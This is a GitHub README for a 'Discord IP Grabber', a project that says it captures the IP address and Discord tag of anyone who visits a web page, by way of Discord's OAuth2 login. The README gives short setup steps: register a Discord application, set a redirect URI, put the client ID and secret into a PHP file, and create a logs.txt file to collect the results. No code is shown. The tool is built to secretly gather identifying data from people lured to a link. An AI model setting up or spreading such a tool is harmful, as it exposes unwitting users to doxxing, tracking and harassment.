Skip to content

Latest commit

 

History

History
10 lines (8 loc) · 418 Bytes

README.md

File metadata and controls

10 lines (8 loc) · 418 Bytes

Discord IP Grabber

Grabs a users IP and Discord Tag after visiting a web page using Discords oauth2

How To Use

  1. Go to https://discordapp.com/developers
  2. Press "New Application" and name it whatever you want.
  3. Go to OAuth2 and add your Redirect URI
  4. Grab the Client ID and the Client Secret and enter it in the .php file

Make sure to create a new file called logs.txt in the same directory